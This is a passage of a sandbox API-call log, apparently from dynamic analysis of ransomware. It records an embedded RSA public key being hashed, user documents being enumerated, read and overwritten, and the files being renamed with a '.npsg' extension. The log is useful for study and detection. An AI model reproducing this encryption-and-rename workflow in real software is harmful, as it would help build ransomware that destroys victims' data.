KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0244.761] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0244.771] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0244.773] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0244.773] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0244.773] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0244.773] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0244.783] GetLastError () returned 0x0 [0244.804] GetLastError () returned 0x0 [0244.804] CryptDestroyHash (hHash=0x33f0488) returned 1 [0244.804] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0244.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0244.804] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0244.804] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0244.804] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0244.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0244.856] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0244.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8ccd0 [0244.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0244.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8a4c8 [0244.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0244.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0244.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0244.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0244.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0244.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0244.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0244.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0244.943] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xaf10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.998] WriteFile (in: hFile=0x644, lpBuffer=0x6affc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x6affc0*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0245.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b8ccd0 [0245.009] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0245.009] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0245.009] CloseHandle (hObject=0x644) returned 1 [0245.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd0) returned 0x3397a08 [0245.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e0) returned 0x3b8ccd0 [0245.011] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o-VEn20ISOuQV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o-ven20isouqv.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o-VEn20ISOuQV.docx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o-ven20isouqv.docx.npsg")) returned 1 [0245.014] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc883d0, ftCreationTime.dwHighDateTime=0x1d5b6df, ftLastAccessTime.dwLowDateTime=0x7ed68b80, ftLastAccessTime.dwHighDateTime=0x1d5c5c0, ftLastWriteTime.dwLowDateTime=0x7ed68b80, ftLastWriteTime.dwHighDateTime=0x1d5c5c0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o6M1E", cAlternateFileName="")) returned 1 [0245.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0245.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x3b83ce8 [0245.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d868 [0245.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd0) returned 0x3397a08 [0245.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ba8 [0245.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33fd5c8 [0245.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33fd690 [0245.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33fd758 [0245.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d9b8 [0245.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eb50 [0245.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33fd820 [0245.025] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb1c0ed0, ftCreationTime.dwHighDateTime=0x1d5ba8c, ftLastAccessTime.dwLowDateTime=0xe09f42a0, ftLastAccessTime.dwHighDateTime=0x1d5bbeb, ftLastWriteTime.dwLowDateTime=0xe09f42a0, ftLastWriteTime.dwHighDateTime=0x1d5bbeb, nFileSizeHigh=0x0, nFileSizeLow=0xc16f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RSJMtQYrJ UaRLEty.xlsx", cAlternateFileName="RSJMTQ~1.XLS")) returned 1 [0245.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x106) returned 0x3b7b948 [0245.025] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\RSJMtQYrJ UaRLEty.xlsx") returned=".xlsx" [0245.025] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\RSJMtQYrJ UaRLEty.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\rsjmtqyrj uarlety.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0245.028] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=49519) returned 1 [0245.028] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0245.030] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xc149, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.030] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0245.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0245.032] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0xc16f, lpOverlapped=0x0) returned 1 [0245.033] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0245.033] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.033] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.033] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0245.034] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0245.034] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0245.034] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0245.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0245.034] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0245.035] GetLastError () returned 0x0 [0245.035] CryptDestroyHash (hHash=0x33f0488) returned 1 [0245.035] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0245.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0245.035] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0245.035] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0245.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0245.035] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0245.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0245.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0245.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc170) returned 0x3b95d50 [0245.035] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0245.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0245.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0245.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0245.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0245.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0245.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d79e0 [0245.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89078 [0245.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7290 [0245.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fd0 [0245.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89090 [0245.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89060 [0245.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89000 [0245.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0245.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0245.036] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0245.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8ccd0 [0245.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89090 | out: hHeap=0x620000) returned 1 [0245.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0245.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89060 | out: hHeap=0x620000) returned 1 [0245.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0245.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89060 [0245.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0245.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89000 [0245.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8660 [0245.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b89090 [0245.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0245.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bc90 [0245.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0245.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0245.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0245.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0245.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0245.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0245.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc90 | out: hHeap=0x620000) returned 1 [0245.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0245.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0245.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89090 | out: hHeap=0x620000) returned 1 [0245.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0245.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0245.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89060 | out: hHeap=0x620000) returned 1 [0245.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0245.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0245.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0245.038] GetCurrentThreadId () returned 0x5b4 [0245.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0245.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8a558 [0245.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0245.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0245.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0245.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0245.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0245.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0245.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0245.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0245.038] GetCurrentThreadId () returned 0x5b4 [0245.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0245.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0245.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0245.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0245.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0245.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0245.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0245.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4ac0 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89060 [0245.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89090 [0245.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x33734f8 [0245.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0245.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0245.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0245.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0245.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89000 [0245.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0245.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8660 [0245.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0245.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89018 [0245.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0245.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89048 [0245.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0245.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0245.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0245.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89030 [0245.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0245.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fe8 [0245.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0245.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b890a8 [0245.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fe8 | out: hHeap=0x620000) returned 1 [0245.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fe8 [0245.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89030 | out: hHeap=0x620000) returned 1 [0245.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0245.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0245.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0245.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0245.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd518 [0245.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89090 | out: hHeap=0x620000) returned 1 [0245.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89090 